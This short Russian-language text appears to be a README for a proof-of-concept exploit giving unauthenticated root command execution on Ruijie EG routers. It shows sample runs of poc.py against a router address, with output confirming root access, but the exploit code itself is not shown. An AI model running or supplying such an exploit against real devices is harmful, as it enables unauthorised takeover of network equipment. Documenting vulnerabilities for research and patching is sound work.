
Эксплойт для доказательства концепции неаутентифицированного удаленного выполнения кода в маршрутизаторах серии Ruijie EG (прошивка <=EG_3.0(1)B11P216). Выполняет произвольные команды через специально созданные HTTP-запросы.
Прошивка Ruijie EG Series Routers версии <=EG_3.0(1)B11P216 позволяет неаутентифицированным злоумышленникам удаленно выполнять произвольный код из-за некорректной фильтрации.
$ python3 poc.py 192.168.1.1 'id'
uid=0(root) gid=0(root)
$ python3 poc.py 192.168.1.1 'grep TARGET /etc/openwrt_release'
DISTRIB_TARGET='mediatek/eg310gh-e'